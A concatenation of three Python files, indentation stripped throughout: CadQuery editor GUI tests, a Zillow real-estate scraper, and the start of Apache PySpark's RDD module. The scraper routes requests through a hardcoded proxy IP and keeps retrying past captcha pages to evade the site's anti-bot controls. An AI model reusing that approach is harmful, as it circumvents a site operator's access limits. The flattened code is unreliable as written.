result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
assy = cq.Assembly(result1)
lab, doc = toCAF(assy)
ais = OCP.XCAFPrs.XCAFPrs_AISObject(lab)
show_object(ais)
'''
def test_render_ais(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_ais)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 1)
# test rendering via console
console.execute('show(ais)')
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 2)
code_show_sketch = \
'''import cadquery as cq
s1 = cq.Sketch().rect(1,1)
s2 = cq.Sketch().segment((0,0), (0,3.),"s1")
show_object(s1)
show_object(s2)
'''
def test_render_sketch(main):
qtbot, win = main
obj_tree_comp = win.components['object_tree']
editor = win.components['editor']
debugger = win.components['debugger']
console = win.components['console']
# check that object was removed
obj_tree_comp._toolbar_actions[0].triggered.emit()
assert(obj_tree_comp.CQ.childCount() == 0)
# check that object was rendered usin explicit show_object call
editor.set_text(code_show_sketch)
debugger._actions['Run'][0].triggered.emit()
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 2)
# test rendering via console
console.execute('show(s1); show(s2)')
qtbot.wait(500)
assert(obj_tree_comp.CQ.childCount() == 4)
def test_window_title(monkeypatch, main):
fname = 'test_window_title.py'
with open(fname, 'w') as f:
f.write(code)
qtbot, win = main
#monkeypatch QFileDialog methods
def filename(*args, **kwargs):
return fname, None
monkeypatch.setattr(QFileDialog, 'getOpenFileName',
staticmethod(filename))
win.components["editor"].open()
assert(win.windowTitle().endswith(fname))
# handle a new file
win.components["editor"].new()
# I don't really care what the title is, as long as it's not a filename
assert(not win.windowTitle().endswith('.py'))
def test_module_discovery(tmp_path, editor):
qtbot, editor = editor
with open(tmp_path.joinpath('main.py'), 'w') as f:
f.write('import b')
assert editor.get_imported_module_paths(str(tmp_path.joinpath('main.py'))) == []
tmp_path.joinpath('b.py').touch()
assert editor.get_imported_module_paths(str(tmp_path.joinpath('main.py'))) == [str(tmp_path.joinpath('b.py'))]
def test_launch_syntax_error(tmp_path):
# verify app launches when input file is bad
win = MainWindow()
inputfile = Path(tmp_path).joinpath("syntax_error.py")
modify_file("print(", inputfile)
editor = win.components["editor"]
editor.autoreload(True)
editor.preferences["Autoreload: watch imported modules"] = True
editor.load_from_file(inputfile)
win.show()
assert(win.isVisible())
code_import_module_makebox = \
"""
from module_makebox import *
z = 1
r = makebox(z)
"""
code_module_makebox = \
"""
import cadquery as cq
def makebox(z):
zval = z + 1
return cq.Workplane().box(1, 1, zval)
"""
def test_reload_import_handle_error(tmp_path, main):
TIMEOUT = 500
qtbot, win = main
editor = win.components["editor"]
debugger = win.components["debugger"]
traceback_view = win.components["traceback_viewer"]
editor.autoreload(True)
editor.preferences["Autoreload: watch imported modules"] = True
# save the module and top level script files
module_file = Path(tmp_path).joinpath("module_makebox.py")
script = Path(tmp_path).joinpath("main.py")
modify_file(code_module_makebox, module_file)
modify_file(code_import_module_makebox, script)
# run, verify that no exception was generated
editor.load_from_file(script)
debugger._actions["Run"][0].triggered.emit()
assert(traceback_view.current_exception.text() == "")
# save the module with an error
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
lines = code_module_makebox.splitlines()
lines.remove(" zval = z + 1") # introduce NameError
lines = "\n".join(lines)
modify_file(lines, module_file)
# verify NameError is generated
debugger._actions["Run"][0].triggered.emit()
assert("NameError" in traceback_view.current_exception.text())
# revert the error, verify rerender is triggered
with qtbot.waitSignal(editor.triggerRerender, timeout=TIMEOUT):
modify_file(code_module_makebox, module_file)
# verify that no exception was generated
debugger._actions["Run"][0].triggered.emit()
assert(traceback_view.current_exception.text() == "")
|
scraper.py | import json, asyncio, time, socket, datetime, time
import threading
import pandas as pd
from random import randint, choice
from bs4 import BeautifulSoup
from urllib3.exceptions import MaxRetryError
from urllib3 import ProxyManager, PoolManager, disable_warnings, exceptions
from collections import Counter
from scripts.bds_real_estate_scraper.proxies import Proxies
from scripts.bds_real_estate_scraper.zillow_query import ZillowQuery
# I didn't like the data that we got.
# Trying to find something better.
class Scraper:
"""Class for scraping real estate data from zillow.com"""
def __init__(self, zip_codes, min_price=0, max_price=20_000_000, increment=150_000, max_tries=20, use_cookies=False):
self.domain = "www.zillow.com"
self.zip_codes = set(zip_codes)
self.empty_pages = set()
self.max_price = max_price
self.min_price = min_price
self.rent_max_price = 13_000
self.rent_min_price = 0
self.rent_increment = 1_500
PROXY_HOST = '83.149.70.159:13012'
PROXY_PORT = '13012'
proxy = "http://83.149.70.159:13012"
self.http = ProxyManager(proxy)
# if proxy:
# else:
# disable_warnings(exceptions.InsecureRequestWarning)
# self.http = PoolManager()
self.visited_sites = set()
self.max_tries = max_tries
self.increment = increment
self.max_retries = 20
self.failed_urls = Counter()
self.use_cookies = use_cookies
self.cookies = set()
self.proxy = Proxies()
self.fetches = 0
self.zip_codes_df = pd.read_csv("data/zip_codes.csv")
def get_headers(self):
headers = self.proxy.get_header()
if self.use_cookies:
headers['Cookie'] = "".join(self.cookies.pop())
return headers
def is_captcha(self, html_soup):
captcha_container = html_soup.select(".captcha-container")
if captcha_container:
return True
if html_soup.title is None:
return True
return False
def parse_cookie(self, response):
# TODO: implement the parse_cookie method to be able to send cookies. Get the set cookie from response and add it to the set self.cookies
pass
def get_parsed_query_string(self, soup):
query_state = soup.find('script', {'data-zrr-shared-data-key': 'mobileSearchPageStore'})
assert query_state
query_state = query_state.contents[0].replace("<!--", "").replace("-->", "")
parsed_query_state = json.loads(query_state)
return parsed_query_state
def save_properties(self, zip_code, properties=None):
if properties is None or properties == []:
return
for prop in properties:
if prop:
date_sold, price_change_date = None, None
if 'hdpData' in prop.keys() and 'dateSold' in prop['hdpData']['homeInfo'].keys() and prop['hdpData']['homeInfo']['dateSold'] is not None:
date_sold = datetime.datetime.utcfromtimestamp(prop['hdpData']['homeInfo']['dateSold'] / 1000)
if prop['hdpData']['homeInfo']['dateSold'] == 0:
date_sold = None
if 'hdpData' in prop.keys() and 'datePriceChanged' in prop['hdpData']['homeInfo'].keys() and prop['hdpData']['homeInfo'][
'datePriceChanged'] is not None:
price_change_date = datetime.datetime.utcfromtimestamp(
prop['hdpData']['homeInfo']['datePriceChanged'] / 1000)
if prop['hdpData']['homeInfo']['datePriceChanged'] == 0:
price_change_date = None
values = (prop['id'],
prop['soldPrice'] if 'soldPrice' in prop.keys() else None,
prop['hdpData']['homeInfo']['price'] if 'hdpData' in prop.keys() and 'price' in prop['hdpData']['homeInfo'].keys() else None,
prop['price'] if 'price' in prop.keys() else None,
prop['unformattedPrice'] if 'unformattedPrice' in prop.keys() else None,
prop['addressCity'] if 'addressCity' in prop.keys() else None,
prop['addressState'] if 'addressState' in prop.keys() else None,
# there are two zip codes for some reason. they shoud be the same
prop['addressZipcode'] if 'addressZipcode' in prop.keys() else None,
prop['hdpData']['homeInfo']['zipcode'] if 'hdpData' in prop.keys() and 'zipcode' in prop['hdpData']['homeInfo'].keys() else None,
prop['area'] if 'area' in prop.keys() else None,
prop['pricePerSqft'] if 'pricePerSqft' in prop.keys() else None,
prop['statusType'] if 'statusType' in prop.keys() else None,
prop['statusText'] if 'statusText' in prop.keys() else None,
prop['beds'] if 'beds' in prop.keys() else None,
prop['baths'] if 'baths' in prop.keys() else None,
prop['hdpData']['homeInfo']['homeStatus'] if 'hdpData' in prop.keys() and 'homeStatus' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['city'] if 'hdpData' in prop.keys() and 'city' in prop['hdpData']['homeInfo'].keys() else None,
prop['latLong']['latitude'] if 'latLong' in prop.keys() and prop['latLong'] else None,
prop['latLong']['longitude'] if 'latLong' in prop.keys() and prop['latLong'] else None,
prop['hdpData']['homeInfo']['lotSize'] if 'hdpData' in prop.keys() and 'lotSize' in prop['hdpData']['homeInfo'].keys() else None,
prop['address'] if 'address' in prop.keys() else None,
prop['detailUrl'] if 'detailUrl' in prop.keys() else None,
prop['hdpData']['homeInfo']['zestimate'] if 'hdpData' in prop.keys() and 'zestimate' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['timeOnZillow'] if 'hdpData' in prop.keys() and 'timeOnZillow' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['priceChange'] if 'hdpData' in prop.keys() and 'priceChange' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['priceReduction'] if 'hdpData' in prop.keys() and 'priceReduction' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['rentZestimate'] if 'hdpData' in prop.keys() and 'rentZestimate' in prop['hdpData']['homeInfo'].keys() else None,
price_change_date if 'hdpData' in prop.keys() and 'datePriceChanged' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['homeType'] if 'hdpData' in prop.keys() and 'homeType' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['bedrooms'] if 'hdpData' in prop.keys() and 'bedrooms' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['bathrooms'] if 'hdpData' in prop.keys() and 'bathrooms' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['yearBuilt'] if 'hdpData' in prop.keys() and 'yearBuilt' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['daysOnZillow'] if 'hdpData' in prop.keys() and 'daysOnZillow' in prop['hdpData']['homeInfo'].keys() else None,
prop['variableData']['type'] if 'variableData' in prop.keys() and prop['variableData'] and 'type' in prop['variableData'].keys() else None,
prop['variableData']['text'] if 'variableData' in prop.keys() and prop['variableData'] and 'text' in prop['variableData'].keys() else None,
prop['hdpData']['homeInfo']['livingArea'] if 'hdpData' in prop.keys() and 'livingArea' in prop['hdpData']['homeInfo'].keys() else None,
prop['hdpData']['homeInfo']['lotAreaValue'] if 'hdpData' in prop.keys() and 'lotAreaValue' in prop['hdpData']['homeInfo'].keys() else None,
date_sold if 'hdpData' in prop.keys() and 'dateSold' in prop['hdpData']['homeInfo'].keys() and prop['hdpData']['homeInfo']['dateSold'] is not None else None,
prop['hdpData']['homeInfo']['taxAssessedValue'] if 'hdpData' in prop.keys() and 'taxAssessedValue' in prop['hdpData']['homeInfo'].keys() else None)
with open(f"zip_{zip_code}.csv", "a") as out:
out.write(','.join(["\""+str(x)+"\"" for x in values]) + "\n")
def get_base_url(self, soup, zip_code):
pagination_tag = soup.find(class_='search-pagination')
base_one, base_two = None, None
if pagination_tag:
base_one = pagination_tag.find('a').get('href').split('/')[1]
base_one = f"/{base_one}/"
base_two = "".join(['/',self.zip_codes_df[self.zip_codes_df['Zip_code']==int(zip_code)]['City'].values[0].lower().replace(" ", "-"), '-new-york-ny', f"-{zip_code}", '/'])
if base_one is None and base_two:
return base_two
if base_one and base_two and (base_one != base_two):
print(f"The bases are different! from pagination:{base_one}, from database: {base_two}")
return base_one
return base_one
def process_page(self, html_soup, url, zip_code):
print(f"Processing page: {url}")
try:
parsed_query_string = self.get_parsed_query_string(html_soup)
results = parsed_query_string['cat1']['searchResults']['listResults'] if 'cat1' in parsed_query_string.keys() else []
results.extend(parsed_query_string['cat2']['searchResults']['listResults'] if 'cat2' in parsed_query_string.keys() else [])
self.save_properties(zip_code, results)
except AssertionError:
print("Can't find query state object in response")
def find_urls(self, zip_code):
""" Make a list of all the urls we need to scrape to find the most houses in the current zip_code"""
urls = set()
zip_url = f"https://www.zillow.com/homes/{zip_code}_rb"
try:
main_url_soup = self.fetch(zip_url) #initial page with the zip code to find the map settings and other info
# Now parse the query state string from the response
parsed_query_string = self.get_parsed_query_string(main_url_soup)
base = self.get_base_url(main_url_soup, zip_code)
if (self.get_number_of_properties(main_url_soup) == 0):
return urls
except AssertionError:
print("Unable to find the query string! going to try again later!")
return set() # Return an empty set
except MaxTriesError as e:
print("Error! Something happened")
print(e)
return set() # Return an empty set
query_state_dict = parsed_query_string['queryState'] # This a dictionary from zillow with a bunch of info
# Create all the urls using info from the query_state_dict
for status in [0, 1, 2]:
current_max_price = self.min_price+self.increment
max_price = self.max_price
min_price = self.min_price
increment = self.increment
if status == 2:
current_max_price = self.rent_min_price+self.rent_increment
max_price = self.rent_max_price
min_price = self.rent_min_price
increment = self.rent_increment
while current_max_price <= max_price:
query = ZillowQuery(min_price=min_price, max_price=current_max_price, status=status, base=base, **query_state_dict)
page_one_url = query.get_first_url()
try:
page_one_soup = self.fetch(page_one_url)
except MaxTriesError as e:
print(e)
current_max_price += increment
continue
# num_results = self.get_number_of_properties(page_one_soup)
num_of_pages = self.get_number_of_pages(page_one_soup)
if self.is_empty(page_one_soup):
self.empty_pages.add(page_one_url)
min_price = current_max_price
current_max_price += increment
if current_max_price >= 700_000:
increment = increment*4
continue
self.process_page(page_one_soup, page_one_url, zip_code)
if num_of_pages != 0:
query_urls = query.get_urls(first=2, last=num_of_pages)
urls.update(query_urls)
min_price = current_max_price
current_max_price += increment
if current_max_price >= 700_000:
increment = increment*3
return urls
def fetch(self, url):
soup, tries = None, 1
while True:
headers = self.get_headers()
try:
source = self.http.request('GET', url, headers=headers, timeout=10)
self.fetches += 1
soup = BeautifulSoup(source.data, 'lxml')
if not self.is_captcha(soup):
# The page is valid so we can just return a soup version of the site
self.visited_sites.add(url)
# Add cookie to the pool of cookies
new_cookie = self.parse_cookie(source)
self.cookies.add(new_cookie)
return soup
tries += 1
if tries%5 == 0 and tries >= self.max_tries/2:
time.sleep(tries*0.15)
if tries > self.max_tries:
print(f"The upper bound of tries has been reached for url {url}")
raise MaxTriesError
except (MaxTriesError, TimeoutError, MaxRetryError, socket.timeout):
if self.failed_urls[url] >= self.max_retries:
del self.failed_urls[url]
print("The URL failed too many times, check the proxy or the internet connection")
else:
self.failed_urls.update([url])
print("Will try again later")
time.sleep(10)
return BeautifulSoup("", 'lxml')
def run(self):
number_of_threads = 1
# for zip_code in self.zip_codes:
# with open(f"zip_{zip_code}.csv", "w") as out:
# out.write("")
i = 1
number_of_zip_codes = len(self.zip_codes)
while self.zip_codes:
threads = []
# self.num_of_threads = 1
for _ in range(number_of_threads):
if self.zip_codes:
try:
current_zip_code = self.zip_codes.pop()
print(f"{i} out of {number_of_zip_codes}")
i += 1
t = threading.Thread(target=self.process_zip, args=[current_zip_code])
t.start()
threads.append(t)
except IndexError as e:
continue
for thread in threads:
thread.join()
def process_zip(self, zip_code):
print(f"Processing zip code: {zip_code}")
urls = self.find_urls(zip_code)
print(f"Processing Pages in zip code: {zip_code}")
for url in urls:
try:
self.process_page(self.fetch(url), url, zip_code)
except MaxTriesError:
continue
self.handle_failed_pages(zip_code)
def get_number_of_pages(self, page_soup):
pagination_div = page_soup.find(class_='search-pagination')
if pagination_div is None:
return 0 # There is no pagination section in the page
try:
return int(pagination_div.select(".Text-c11n-8-27-0__aiai24-0")[0].text.split(" ")[-1])
except Exception as e:
print(e)
print("Error getting the number of page")
return 0
def get_number_of_properties(self, page_soup):
num = page_soup.find(class_='result-count')
if num:
num = num.get_text().replace(',', '').replace('results', '').replace(" ", "")
try:
num = int(num)
except (ValueError, TypeError):
return 500
return num
def is_empty(self, page_soup):
zero_result_message = page_soup.find(class_='zero-results-message')
if zero_result_message or page_soup.title is None:
return True
return False
def handle_failed_pages(self, zip_code):
failed_urls = set(self.failed_urls.keys())
if not failed_urls:
return
while failed_urls:
try:
current_url = failed_urls.pop()
if current_url in self.visited_sites:
continue
if 'home' in current_url:
zip_code = current_url.split('/')[-1].replace('_rb', '')
failed_urls.update(self.find_urls(zip_code))
elif '_p' in current_url:
try:
page_soup = self.fetch(current_url)
except MaxTriesError:
continue
if self.is_empty(page_soup):
self.empty_pages.add(current_url)
continue
self.process_page(page_soup, current_url, zip_code)
else:
try:
page_soup = self.fetch(current_url)
except MaxTriesError:
continue
if self.is_empty(page_soup):
self.empty_pages.add(current_url)
continue
self.process_page(page_soup, current_url, zip_code)
if current_url in self.failed_urls.keys():
self.failed_urls.pop(current_url)
except IndexError:
break # No items left
class MaxTriesError(Exception):
pass
if __name__ == "__main__":
# Test scraper on one page.
# asyncio.run(do_something())
df = pd.read_csv("data/zip_codes_x_covid.csv")
zip_codes = set(df['Zip_code'].tolist())
zip_codes = zip_codes.union(
{10280, 10282, 10301, 10302, 10303, 10304, 10305, 10306, 10307, 10308, 10309, 10310, 10312, 10314, 11355, 11357,
11418, 11419, 11420, 11421, 11422, 11426, 11427, 11428, 11429, 11432, 11433, 11434, 11435, 11436, 10451, 10452,
10453, 10455, 10456, 10457, 10458, 10459, 10460, 10461, 10462, 10463, 10464, 10465, 10466, 10467, 10468, 10469,
10470, 10471, 10472, 10473, 10474, 10475, 11001, 11004, 10001, 10002, 10004, 10007, 10009, 10010, 10011, 10013,
10014, 10019, 10021, 10023, 10024, 10025, 10026, 10027, 10028, 10029, 10030, 10031, 10032, 10033, 10034, 10035,
10036, 10037, 10038, 10039, 10040, 10044, 10065, 10075, 11109, 10541})
s = Scraper(zip_codes)
s.run()
|
rdd.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from collections import namedtuple
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
import traceback
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
from random import Random
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, pack_long
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def _extract_concise_traceback():
"""
This function returns the traceback info for a callsite, returns a dict
with function name, file name and line number
"""
tb = traceback.extract_stack()
callsite = namedtuple("Callsite", "function file linenum")
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return callsite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame-1]
return callsite(function=sfun, file=ufile, linenum=uline)
_spark_stack_depth = 0
class _JavaStackTrace(object):
def __init__(self, sc):
tb = _extract_concise_traceback()
if tb is not None:
self._traceback = "%s at %s:%s" % (tb.function, tb.file, tb.linenum)
else:
self._traceback = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
global _spark_stack_depth
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(self._traceback)
_spark_stack_depth += 1
def __exit__(self, type, value, tb):
global _spark_stack_depth
_spark_stack_depth -= 1
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
class MaxHeapQ(object):
"""
An implementation of MaxHeap.
>>> import pyspark.rdd
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(10)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(1)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> heap.getElements()
[0]
"""
def __init__(self, maxsize):
# we start from q[1], this makes calculating children as trivial as 2 * k
self.q = [0]
self.maxsize = maxsize
def _swim(self, k):
while (k > 1) and (self.q[k/2] < self.q[k]):
self._swap(k, k/2)
k = k/2
def _swap(self, i, j):
t = self.q[i]
self.q[i] = self.q[j]
self.q[j] = t
def _sink(self, k):
N = self.size()
while 2 * k <= N:
j = 2 * k
# Here we test if both children are greater than parent
# if not swap with larger one.
if j < N and self.q[j] < self.q[j + 1]:
j = j + 1
if(self.q[k] > self.q[j]):
break
self._swap(k, j)
k = j
def size(self):
return len(self.q) - 1
def insert(self, value):
if (self.size()) < self.maxsize:
self.q.append(value)
self._swim(self.size())
else:
self._replaceRoot(value)
def getElements(self):
return self.q[1:]
def _replaceRoot(self, value):
if(self.q[1] > value):
self.q[1] = value
self._sink(1)
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self._jrdd.cache()
return self
def persist(self, storageLevel):
"""
Set this RDD's storage level to persist its values across operations after the first time
it is computed. This can only be used to assign a new storage level if the RDD does not
have a storage level set yet.
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
else:
return None
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(split, iterator): return imap(f, iterator)
return PipelinedRDD(self, func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator): return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator): return f(iterator)
return self.mapPartitionsWithIndex(func)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator): return ifilter(f, iterator)
return self.mapPartitions(func)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD (relies on numpy and falls back
on default random generator if numpy is unavailable).
>>> sc.parallelize(range(0, 100)).sample(False, 0.1, 2).collect() #doctest: +SKIP
[2, 3, 20, 21, 24, 41, 42, 66, 67, 89, 90, 98]
"""
assert fraction >= 0.0, "Invalid fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD (currently requires numpy).
>>> sc.parallelize(range(0, 10)).takeSample(True, 10, 1) #doctest: +SKIP
[4, 2, 1, 8, 2, 7, 0, 4, 1, 4]
"""
fraction = 0.0
total = 0
multiplier = 3.0
initialCount = self.count()
maxSelected = 0
if (num < 0):
raise ValueError
if (initialCount == 0):
return list()
if initialCount > sys.maxint - 1:
maxSelected = sys.maxint - 1
else:
maxSelected = initialCount
if num > initialCount and not withReplacement:
total = maxSelected
fraction = multiplier * (maxSelected + 1) / initialCount
else:
fraction = multiplier * (num + 1) / initialCount
total = num
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
rand = Random(seed)
while len(samples) < total:
samples = self.sample(withReplacement, fraction, rand.randint(0, sys.maxint)).collect()
sampler = RDDSampler(withReplacement, fraction, rand.randint(0, sys.maxint))
sampler.shuffle(samples)
return samples[0:total]
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will not
contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda x: (len(x[1][0]) != 0) and (len(x[1][1]) != 0)) \
.keys()
def _reserialize(self):
if self._jrdd_deserializer == self.ctx.serializer:
return self
else:
return self.map(lambda x: x, preservesPartitioning=True)
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc = lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5), ('little', 4), ('Mary', 1), ('was', 8), ('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
bounds = list()
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
if numPartitions > 1:
rddSize = self.count()
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
